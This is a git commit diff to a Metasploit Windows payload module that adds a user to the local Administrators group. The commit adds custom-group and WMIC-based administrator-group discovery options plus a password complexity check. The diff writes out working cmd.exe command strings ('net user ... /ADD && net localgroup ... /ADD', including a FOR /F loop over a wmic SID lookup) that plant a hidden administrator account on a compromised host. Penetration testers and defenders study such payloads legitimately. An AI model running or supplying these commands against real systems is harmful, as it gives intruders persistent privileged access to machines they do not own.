Added WMIC and complexity checks

unstable
Chris John Riley 2012-06-02 19:41:12 +02:00
parent bada88cdf0
commit ea66deb779
1 changed files with 34 additions and 4 deletions

View File

@ -28,7 +28,7 @@ module Metasploit3
'Name' => 'Windows Execute net user /ADD', 'Name' => 'Windows Execute net user /ADD',
'Version' => '$Revision$', 'Version' => '$Revision$',
'Description' => 'Create a new user and add them to local administration group', 'Description' => 'Create a new user and add them to local administration group',
'Author' => 'hdm', 'Author' => ['hdm','Chris John Riley'],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Platform' => 'win', 'Platform' => 'win',
'Arch' => ARCH_X86, 'Arch' => ARCH_X86,
@ -39,6 +39,13 @@ module Metasploit3
[ [
OptString.new('USER', [ true, "The username to create", "metasploit" ]), OptString.new('USER', [ true, "The username to create", "metasploit" ]),
OptString.new('PASS', [ true, "The password for this user", "metasploit" ]), OptString.new('PASS', [ true, "The password for this user", "metasploit" ]),
OptString.new('CUSTOM', [ false, "Custom group name to be used instead of default", '' ]),
OptBool.new('WMIC', [ true, "Use WMIC on the target to resolve administrators group", false ]),
], self.class)
register_advanced_options(
[
OptBool.new("COMPLEXITY", [ true, "Check password for complexity rules", true ]),
], self.class) ], self.class)
# Hide the CMD option...this is kinda ugly # Hide the CMD option...this is kinda ugly
@ -51,13 +58,36 @@ module Metasploit3
def command_string def command_string
user = datastore['USER'] || 'metasploit' user = datastore['USER'] || 'metasploit'
pass = datastore['PASS'] || '' pass = datastore['PASS'] || ''
cust = datastore['CUSTOM'] || ''
wmic = datastore['WMIC']
complexity= datastore['COMPLEXITY']
if(pass.length > 14) if(pass.length > 14)
raise ArgumentError, "Password for the adduser payload must be 14 characters or less" raise ArgumentError, "Password for the adduser payload must be 14 characters or less"
end end
if (pass =~ /\A^.*((?=.{8,})(?=.*[a-z])(?=.*[A-Z])(?=.*[\d\W])).*$/) and complexity
print_good "Password: #{pass} passes complexity checks"
elsif complexity
print_error "Password: #{pass} doesn't meet complexity requirements and may cause issues"
end
if not cust.empty?
print_status("Using custom group name #{cust}")
return "cmd.exe /c net user #{user} #{pass} /ADD && " +
"net localgroup \"#{cust}\" #{user} /ADD"
elsif wmic
print_status("Using WMIC to discover the administrative group name")
return "cmd.exe /c \"FOR /F \"usebackq tokens=2* skip=1 delims==\" " +
"%G IN (`wmic group where sid^='S-1-5-32-544' get name /Value`); do " +
"FOR /F \"usebackq tokens=1 delims==\" %X IN (`echo %G`); do " +
"net user #{user} #{pass} /ADD && " +
"net localgroup \"%X\" #{user} /ADD\""
else
return "cmd.exe /c net user #{user} #{pass} /ADD && " + return "cmd.exe /c net user #{user} #{pass} /ADD && " +
"net localgroup Administrators #{user} /ADD" "net localgroup Administrators #{user} /ADD"
end end
end end
end